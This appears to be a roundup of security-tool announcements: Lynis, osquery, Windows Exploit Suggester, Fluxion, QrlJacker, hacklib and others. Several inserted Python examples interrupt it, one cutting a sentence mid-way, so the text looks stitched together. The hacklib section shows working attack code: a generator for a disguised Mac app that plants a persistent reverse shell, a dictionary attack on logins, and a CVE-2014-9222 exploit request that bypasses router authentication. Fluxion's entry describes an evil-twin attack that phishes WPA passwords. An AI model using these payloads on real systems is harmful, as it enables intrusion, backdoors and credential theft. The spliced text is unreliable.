Currently, if the 'systeminfo' command reveals 'File 1' as the output for the hotfixes, it will not be able to determine which are installed on the target. If this occurs, the list of hotfixes will need to be retrieved from the target host and passed in using the --hotfixes flag.

It currently does not separate 'editions' of the Windows OS such as 'Tablet' or 'Media Center', for example, or different architectures, such as Itanium-based only.

False positives also occur where it assumes EVERYTHING is installed on the target Windows operating system. If you receive the 'File 1' output, try executing 'wmic qfe list full' and feed that as input with the --hotfixes flag, along with the 'systeminfo'
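The comparison logic described above (assume every bulletin for the identified OS applies, then remove those whose KB is listed in the hotfix data) together with the 'File 1' limitation, as an added example that is not the tool's own code. The bulletin table is a constructed stand-in for the downloaded spreadsheet using bulletin ids and KB numbers from the sample output; the product column and the systeminfo excerpts are constructed, and the `hotfixes` argument stands in for the --hotfixes fallback.

```python
import re

# Constructed stand-in for the bulletin spreadsheet: (bulletin, KB, title, product).
# Bulletin ids and KB numbers are from the sample output; the product mapping is assumed.
BULLETINS = [
    ("MS14-012", "2925418", "Cumulative Security Update for Internet Explorer", "Windows 7 SP1 32-bit"),
    ("MS13-009", "2792100", "Cumulative Security Update for Internet Explorer", "Windows 7 SP1 32-bit"),
    ("MS13-005", "2778930", "Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege", "Windows 7 SP1 32-bit"),
]

# Constructed excerpt of `systeminfo` output from a Windows 7 SP1 host.
SYSTEMINFO_OK = """\
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2792100
                           [02]: KB2778930
"""

# Constructed excerpt showing the 'File 1' case from the limitations section.
SYSTEMINFO_FILE1 = SYSTEMINFO_OK.split("Hotfix(s):")[0] + """\
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: File 1
"""


class HotfixListUnavailable(Exception):
    """systeminfo listed no KB numbers; supply the hotfix list explicitly."""


def parse_hotfixes(systeminfo_text):
    """Return the set of KB numbers (digits only) listed under Hotfix(s)."""
    kbs = set()
    for line in systeminfo_text.splitlines():
        m = re.match(r"\s*\[\d+\]:\s*(.+?)\s*$", line)
        if not m:
            continue
        value = m.group(1)
        if re.match(r"file\s+\d+$", value, re.IGNORECASE):
            raise HotfixListUnavailable("got %r; use 'wmic qfe list full' output instead" % value)
        kbs.add(re.sub(r"^KB", "", value, flags=re.IGNORECASE))
    return kbs


def hotfix_list_available(systeminfo_text):
    """True when systeminfo carries usable KB numbers, False in the 'File 1' case."""
    try:
        parse_hotfixes(systeminfo_text)
    except HotfixListUnavailable:
        return False
    return True


def identify_os(systeminfo_text):
    """Build the product label used to select bulletins, e.g. 'Windows 7 SP1 32-bit'."""
    name = re.search(r"OS Name:\s*(.+)", systeminfo_text).group(1)
    version = re.search(r"OS Version:\s*(.+)", systeminfo_text).group(1)
    systype = re.search(r"System Type:\s*(.+)", systeminfo_text).group(1)
    product = re.search(r"Windows (?:Server )?\S+(?: R2)?", name).group(0)
    sp = re.search(r"Service Pack (\d+)", version)
    arch = "64-bit" if "x64" in systype.lower() else "32-bit"
    return " ".join(p for p in (product, "SP%s" % sp.group(1) if sp else "", arch) if p)


def suggest(os_label, installed_kbs, bulletins=BULLETINS):
    """Assume every bulletin for the OS applies, then drop those whose KB is installed.

    Everything the OS could run is assumed present, which is the source of the
    false positives described above (e.g. IE bulletins on a host without IE use).
    """
    candidates = [b for b in bulletins if b[3] == os_label]
    return [b for b in candidates if b[1] not in installed_kbs]


def run(systeminfo_text, hotfixes=None):
    """Full pass; `hotfixes` mirrors the --hotfixes fallback for the 'File 1' case."""
    os_label = identify_os(systeminfo_text)
    installed = set(hotfixes) if hotfixes is not None else parse_hotfixes(systeminfo_text)
    return os_label, suggest(os_label, installed)


if __name__ == "__main__":
    label, missing = run(SYSTEMINFO_OK)
    print("[+] windows version identified as %r" % label)
    for bulletin, kb, title, _ in missing:
        print("[*] %s: %s (%s)" % (bulletin, title, kb))
```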


Droid-Hunter - Android Application Vulnerability Analysis And Android Pentest Tool




[DROID-HUNTER ASCII banner]
By HaHwul
www.hahwul.com
https://github.com/hahwul/droid-hunter


DROID-HUNTER

1. DROID-HUNTER
Android application vulnerability analysis and Android pentest tool

A. Support
App info check
Baksmaling android app
Decompile android app
Extract class file
Extract java code
Pattern base Information Leakage

2. How to Install?

A. Download(clone) & Unpack DROID-HUNTER
git clone https://github.com/hahwul/droid-hunter.git
cd droid-hunter
B. Install Ruby GEM
gem install html-table
gem install colorize
C. Run DROID-HUNTER
ruby dhunter.rb

3. How to Use?
Usage: ruby dhunter.rb [APK]
Command
-a, --apk : Analyze an Android APK file.
+ APK Analysis
=> dhunter -a 123.apk[apk file]
=> dhunter --apk 123.apk aaa.apk test.apk hwul.apk
-p, --pentest : Penetration test a device
+ Pentest Android
=> dhunter -p device[device code]
=> dhunter --pentest device
-v, --version : Show this droid-hunter version
-h, --help : Show help page

4. Support
Contact hahwul@gmail.com

5. Screen shot



Lynis 2.3.4 - Security Auditing Tool for Unix/Linux Systems


We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool, used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initializing the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.
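The report file mentioned above is what most people automate against. The following parser is an added example, not part of Lynis itself; it assumes the key=value layout of lynis-report.dat, where list-valued keys end in "[]" and each warning[] / suggestion[] value is pipe-separated with the test ID as its first field, and the sample report embedded below is constructed for illustration (the test IDs are taken from the changelog further down, the messages are made up).

```python
"""Parse a Lynis report file (lynis-report.dat) into structured findings."""
from collections import defaultdict

# Constructed sample in the style of lynis-report.dat (not real scan output).
SAMPLE_REPORT = """\
# Lynis Report
report_version_major=1
report_version_minor=0
lynis_version=2.3.4
os=Linux
hardening_index=64
warning[]=FIRE-4520|nftables ruleset is empty|-|-|
warning[]=PKGS-7322|Found one or more vulnerable packages|-|-|
suggestion[]=FILE-6344|Consider mounting /proc with hidepid|-|-|
suggestion[]=NAME-4408|Add the IP name and FQDN to /etc/hosts|-|-|
installed_packages=412
"""


def parse_report(text):
    """Return scalar keys in one dict and repeated "key[]" entries as lists."""
    scalars = {}
    lists = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # comments and malformed lines are skipped, not fatal
        key, value = line.split("=", 1)
        if key.endswith("[]"):
            lists[key[:-2]].append(value)
        else:
            scalars[key] = value
    return {"scalars": scalars, "lists": dict(lists)}


def findings(parsed, kind):
    """Split warning/suggestion entries into (test_id, message) pairs."""
    out = []
    for entry in parsed["lists"].get(kind, []):
        fields = entry.split("|")
        message = fields[1] if len(fields) > 1 else ""
        out.append((fields[0], message))
    return out


def hardening_index(parsed):
    """Hardening index as an int, or None if the report lacks it."""
    value = parsed["scalars"].get("hardening_index")
    return int(value) if value is not None and value.isdigit() else None


def summarize(text):
    """One-shot summary suitable for a cron job or a CI gate on the index."""
    parsed = parse_report(text)
    return {
        "hardening_index": hardening_index(parsed),
        "warnings": findings(parsed, "warning"),
        "suggestions": findings(parsed, "suggestion"),
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_REPORT)
    print("hardening index:", summary["hardening_index"])
    for test_id, msg in summary["warnings"]:
        print("WARNING   ", test_id, msg)
    for test_id, msg in summary["suggestions"]:
        print("SUGGESTION", test_id, msg)
```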

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. When, during the Apache scan, it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing so, it collects the discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


Changelog
Upgrade note
* Lynis 2.3.4 (2016-09-27) *

Changes:
--------
* Skip update message when using the 'show' helper
* Instead of opening the log file, you can now use 'lynis show details' followed
by the test ID. It will show the relevant section.
* Several tests have extended log details
* Many style improvements as part of ongoing refactoring of the code
* Detection of nftables improved
* Replaced cut, sed, tr and other commands with binary variables (for forensics
and future intrusion checking capabilities)
* Swedish translation provided by Peter Carlsson
* Support for arch-audit to scan for presence of vulnerable packages on Arch Linux
* OS detection improved

Tests:
------
* CONT-8107 - New test checking number of Docker containers
* CRYP-7902 - Gather more details regarding certificates
* DBS-1816 - Define skip reason
* FILE-6344 - Adjusted /proc test for hidepid option
* FILE-6362 - Removed warning and add skip reason
* FIRE-4520 - Change test to use detected binary
* FIRE-4520 - New test to check for empty nftables ruleset
* KRNL-5820 - Corrected function and style improvements
* LOGG-2146 - Textual change
* NAME-4408 - Check localhost to IP mapping
* PKGS-7320 - Test for arch-audit tool
* PKGS-7322 - Check vulnerable packages on Arch Linux
* PKGS-7381 - Extended vulnerable package detection for FreeBSD
* TIME-3104 - timedatectl test now detects NTP synchronization properly


QrlJacker - QrlJacking Exploitation Framework


A Python framework whose goal is to exploit the QrlJacking attack vector easily

Installation

Requirements

  • Python 2.7.x
  • Requests
  • Pillow
  • Selenium

Installation on Windows

After downloading the framework
cd QrlJacking-Framework
pip install -r requirements.txt
python QRLJacker.py

Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/OWASP/QRLJacking
cd QrlJacking-Framework
pip install -r requirements.txt
python QRLJacker.py

Installation on OSX

git clone https://github.com/OWASP/QRLJacking
cd QrlJacking-Framework
sudo easy_install pip
sudo pip install -r requirements.txt
python QRLJacker.py

Currently QrlJacker supports the following websites:
1)whatsapp
2)WeChat
3)Weibo
4)Yandex
5)Taobao
6)Taobao Trips
7)AliPay
8)Yandex Money
9)Yandex Passport
10)Airdroid
11)MyDigiPass
12)Zapper
13)Trustly App
14)Yelophone

To Do List :
1)Line
2)QQ Instant Messaging
3)QQ Mail
4)Alibaba
5)Aliexpress
6)Tmall
7)1688.com
8)Alimama
9)TenPay
10)Alibaba Yunos

ONIOFF - Onion URL Inspector


A simple tool - written in pure python - for inspecting Deep Web URLs (or onions).
Compatible with Python 2.6 & 2.7.
Author: Nikolaos Kamarinakis ( nikolaskama.me )


Installation
You can download ONIOFF by cloning the Git Repo and simply installing its requirements:
$ git clone https://github.com/k4m4/onioff.git
$ cd onioff
$ pip install -r requirements.txt

Usage
Usage: python onioff.py {onion} [options]
To view all available options run:
$ python onioff.py -h
NOTE : In order for ONIOFF to work, Tor must be correctly configured and running.

Demo
Here's a short demo:
https://nikolaskama.me/content/images/2016/09/onioff_demo.png



osquery - SQL powered operating system instrumentation, monitoring, and analytics


osquery is an operating system instrumentation framework for OS X and Linux. 
The tools make low-level operating system analytics and monitoring both performant and intuitive.

Platforms with continuous build status: OS X 10.9, OS X 10.10/11, CentOS 6.x, CentOS 7.x, Ubuntu 12.04, Ubuntu 14.04, Ubuntu 16.04, Windows 10.
  • Homepage: https://osquery.io
  • Downloads: https://osquery.io/downloads
  • Tables: https://osquery.io/tables
  • Packs: https://osquery.io/packs
  • Guide: https://osquery.readthedocs.org
  • Slack: https://osquery-slack.herokuapp.com

What is osquery?
osquery exposes an operating system as a high-performance relational database. This allows you to write SQL-based queries to explore operating system data. With osquery, SQL tables represent abstract concepts such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes.
SQL tables are implemented via a simple plugin and extensions API. A variety of tables already exist and more are being written: https://osquery.io/tables . To best understand the expressiveness that is afforded to you by osquery, consider the following SQL queries:
List the users :
SELECT * FROM users;
Check the processes that have a deleted executable:
SELECT * FROM processes WHERE on_disk = 0;
Get the process name, port, and PID, for processes listening on all interfaces:
SELECT DISTINCT processes.name, listening_ports.port, processes.pid
FROM listening_ports JOIN processes USING (pid)
WHERE listening_ports.address = '0.0.0.0';
Find every OS X LaunchDaemon that launches an executable and keeps it running:
SELECT name, program || program_arguments AS executable
FROM launchd
WHERE (run_at_load = 1 AND keep_alive = 1)
AND (program != '' OR program_arguments != '');
Check for ARP anomalies from the host's perspective:
SELECT address, mac, COUNT(mac) AS mac_count
FROM arp_cache GROUP BY mac
HAVING count(mac) > 1;
Alternatively, you could also use a SQL sub-query to accomplish the same result:
SELECT address, mac, mac_count
FROM
(SELECT address, mac, COUNT(mac) AS mac_count FROM arp_cache GROUP BY mac)
WHERE mac_count > 1;
These queries can be:
  • performed on an ad-hoc basis to explore operating system state using the osqueryi shell
  • executed via a scheduler to monitor operating system state across a set of hosts
  • launched from custom applications using osquery Thrift APIs
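Because osquery tables are plain SQL, the queries above can be prototyped offline before they are scheduled across a fleet. The block below is an added example, not osquery's own code: it recreates the arp_cache, processes and listening_ports tables in an in-memory SQLite database with constructed rows (only the columns the queries touch), runs the page's ARP-anomaly queries in both forms and checks that they agree, and runs the listening-port and deleted-executable queries.

```python
"""Prototype osquery-style detection queries against mock tables in SQLite."""
import sqlite3

# The three queries quoted on the page, unchanged.
ARP_DUPLICATE_MAC = """
SELECT address, mac, COUNT(mac) AS mac_count
FROM arp_cache GROUP BY mac
HAVING COUNT(mac) > 1;
"""
ARP_DUPLICATE_MAC_SUBQUERY = """
SELECT address, mac, mac_count
FROM (SELECT address, mac, COUNT(mac) AS mac_count FROM arp_cache GROUP BY mac)
WHERE mac_count > 1;
"""
LISTENING_ON_ALL_INTERFACES = """
SELECT DISTINCT processes.name, listening_ports.port, processes.pid
FROM listening_ports JOIN processes USING (pid)
WHERE listening_ports.address = '0.0.0.0';
"""


def build_mock_db():
    """Create mock tables with constructed sample rows (not data from a real host)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE arp_cache (address TEXT, mac TEXT, interface TEXT);
        CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT, on_disk INTEGER);
        CREATE TABLE listening_ports (pid INTEGER, port INTEGER, address TEXT);
    """)
    # One MAC answering for two IP addresses is the anomaly the ARP query flags.
    db.executemany("INSERT INTO arp_cache VALUES (?, ?, ?)", [
        ("10.0.0.1", "aa:bb:cc:00:00:01", "eth0"),
        ("10.0.0.7", "aa:bb:cc:00:00:07", "eth0"),
        ("10.0.0.9", "aa:bb:cc:00:00:07", "eth0"),
    ])
    db.executemany("INSERT INTO processes VALUES (?, ?, ?, ?)", [
        (101, "sshd", "/usr/sbin/sshd", 1),
        (202, "nc", "/usr/bin/nc", 1),
        (303, "updater", "/tmp/updater", 0),   # binary deleted after launch
    ])
    db.executemany("INSERT INTO listening_ports VALUES (?, ?, ?)", [
        (101, 22, "0.0.0.0"),
        (202, 4444, "0.0.0.0"),
        (303, 8080, "127.0.0.1"),              # loopback only, not reported
    ])
    return db


def query(db, sql):
    return db.execute(sql).fetchall()


def duplicate_macs(db):
    """(mac, count) for MACs claiming more than one IP; both query forms must agree."""
    grouped = [(mac, n) for _addr, mac, n in query(db, ARP_DUPLICATE_MAC)]
    nested = [(mac, n) for _addr, mac, n in query(db, ARP_DUPLICATE_MAC_SUBQUERY)]
    if grouped != nested:
        raise ValueError("GROUP BY/HAVING and sub-query forms diverged")
    return grouped


def exposed_listeners(db):
    """(name, port, pid) for processes bound to all interfaces."""
    return query(db, LISTENING_ON_ALL_INTERFACES)


def deleted_executables(db):
    """(name, pid) for processes whose executable is no longer on disk."""
    return query(db, "SELECT name, pid FROM processes WHERE on_disk = 0;")


if __name__ == "__main__":
    db = build_mock_db()
    print("duplicate MACs:", duplicate_macs(db))
    print("listening on all interfaces:", exposed_listeners(db))
    print("deleted executables:", deleted_executables(db))
```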

Downloads / Install
For the latest stable and nightly builds for OS X and Linux (deb/rpm), as well as yum and apt repository information, visit https://osquery.io/downloads . For installation information for FreeBSD, which is supported by the osquery community, see the wiki.

Building from source
Building osquery from source is encouraged! Join our developer community by giving us feedback in Github issues or submitting pull requests!

File Integrity Monitoring (FIM)
osquery provides several FIM features too! Just as OS concepts are represented in tabular form, the daemon can track OS events and later expose them in a table. Tables like file_events or yara_events can be selected to retrieve buffered events.
The configuration allows you to organize files and directories for monitoring. Those sets can be paired with lists of YARA signatures or configured for additional monitoring such as access events.

Process and socket auditing
There are several forms of eventing in osquery along with file modifications and accesses. These range from disk mounts, network reconfigurations, hardware attach and detaching, and process starting. For a complete set review the table documentation and look for names with the _events suffix.

Vulnerabilities
Facebook has a bug bounty program that includes osquery. If you find a security vulnerability in osquery, please submit it via the process outlined on that page and do not file a public issue. For more information on finding vulnerabilities in osquery, see a recent blog post about bug-hunting osquery.

Learn more
Read the launch blog post for background on the project. If you're interested in learning more about osquery, visit the users guide and browse our RFC-labeled Github issues. Development and usage discussion is happening in the osquery Slack; grab an invite automatically at https://osquery-slack.herokuapp.com/ !


Fluxion - WPA/WPA2 Security Hacked Without Brute Force


Fluxion is a remake of linset by vk496 with fewer bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) are available HERE. If you're new, please start by reading the wiki.

Fluxion GUI

How it works
  • Scan the networks.
  • Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
  • Use WEB Interface *
  • Launch a FakeAP instance to imitate the original access point
  • Spawns an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
  • A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
  • Each submitted password is verified by the handshake captured earlier
  • The attack will automatically terminate, as soon as a correct password is submitted

Requirements
A Linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.

Credits
  1. Deltax @FLuX and Fluxion main developer
  2. Strasharo @Fluxion help to fix DHCPD and pyrit problems, spelling mistakes
  3. vk496 @Linset main developer of linset
  4. ApatheticEuphoria @WPS-SLAUGHTER,Bruteforce Script,Help with Fluxion
  5. Derv82 @Wifite/2
  6. Princeofguilty @webpages
  7. Photos for wiki @ http://www.kalitutorials.net

Useful links
  1. wifislax
  2. kali
  3. linset
  4. ares


Sandcat Browser 5.3 - PenTest Oriented Web Browser


Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/. See also the docs directory and the credits section below for a few more details about the Sandcat architecture.

Directories
  • /docs - Lua API documentation
  • /packs - contents of uncompressed pack files
    • /Common - common CSS, widgets and scripts package (Common.pak)
    • /Resources - resources package (Resources.pak)
  • /src - the main executable source and built-in resource files
    • /core - user interface source
    • /html - user interface resources (HTML)
    • /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

Compiling
For compiling Sandcat, you will just need Catarinka and pLua.
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog

5.3

This upgrade brings more stability on newer OSes.
  • Fixed: constant freeze during navigation under some Windows installations (IPC related).
  • Fixed: AV when restoring minimized Sciter dialog.
  • Replaced the Selenite library with Catarinka.

5.2

  • Added the ability to create offscreen Chromium renderers using the Lua API.
  • Improved tab status bar text handling.
  • Improved task script error handling.
  • Improved live headers.
  • Improved startup for Windows 10 compatibility.
  • Make window close work as cancel in Preferences dialog.
  • The Chromium library was upgraded to the latest release.
  • Some extensive code cleanup.
  • Minor user experience improvements.
  • 64-bit version now available separately (special thanks to @RJ35 for fixing a Chromium related crash under Win64 environments, making this release possible)
  • Fixed: a rare crash when switching tabs.

5.1

This release addresses minor issues, like a crash when loading a homepage during startup or calling the context menu from a loaded web page.

5.1 Beta 3

This release uses the latest Chromium binaries. This fixes some instability issues when browsing with the live headers enabled.

5.1 Beta 2

This release is focused on stability and performance, as well as some other improvements such as being able to ignore certificate errors while navigating and open PDF files.
Here is what changed in version 5.1:
  • Switched to the WACEF Chromium framework and the latest Chromium binaries. This significantly improves speed and stability, and fixes some issues during shutdown.
  • Most preferences now get applied instantly (just need to open a new tab instead of restarting).
  • Added a certificate error dialog.
  • Added a PDF viewer plugin.
  • Added proxy support.
  • Improved Lua integration.
  • Minor compiler optimizations.
  • The OpenSSL library was upgraded to the latest release.
  • The Selenite library was upgraded to the latest release.

5.0

We're excited to announce a brand new version of our Sandcat Browser (codenamed Catarinka browser), now available as a free, open source project - because many people asked for it, the entire source for Sandcat is now available on GitHub. Feel free to fork it, examine it, contribute code, send suggestions, report or fix issues.
Here is what changed in version 5.0 beta 1:

  • Faster startup and responsiveness.
  • Huge refactoring and cleanup of the current code.
  • The Chromium library was upgraded to the latest release (incredibly fast!).
  • Improved compatibility with 64-bit Windows editions.
  • Improved source code editor.
  • Available as free, open source/community edition (under a BSD-3-Clause license).
  • Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
  • Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions easier in Sandcat. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
  • Fixed: output of the SHA1 and the full URL encoders that come with the pen-tester pack. 

hacklib - Pentesting, Port Scanning, and Logging in anywhere with Python


Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:
pip install hacklib
hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:
python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
Or if you got it using pip:
import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:
hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):
import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when run, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
Generated App:
Listen for connections with Server:
>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!


Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:
import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try:
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass  # login failed
Simple dictionary attack using AuthClient:
import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break


Port Scanning:
from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and send a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')
Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null byte.
# The router's admin page is now fully accessible from any web browser.


FTP authentication:
import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'


Socks4/5 proxy scraping and tunneling
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules is routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: only network activity via Python is masked by the proxy.
# Network activity of other programs, such as your web browser, remains unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')


Word Mangling:
from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()
Output:
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test


Pattern Create:
from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()
Output:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A


Pattern Offset:
from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()
Output:
[+] Offset: 50


Syhunt ScanTools - Console Web Vulnerability Scan Tools


Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: ScanURL, ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single command line. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.
Please note that the full-featured version of the tools is only available for registered users.

System Requirements


  1. 512 MB of memory
  2. 200 MB of free disk space
  3. Internet connection (optional for remote scanning)
  4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, e.g.:
Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

  1. Go to the directory Syhunt Hybrid is installed using the command prompt.
  2. Use the following command-line:
 Scanurl [starturl] -hm:[huntmethod] -gr

Example:
Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

  1. Go to the directory Syhunt is installed using the command prompt.
  2. Example command-line:
 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

  1. Go to the directory Syhunt Hybrid is installed using the command prompt.
  2. Use the following command-line:
 Scanurl [starturl] -hm:[huntmethod] -srcdir:"[SourceDir]" -gr

Example:
Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan, it is not necessary to assign it again using the -srcdir option.
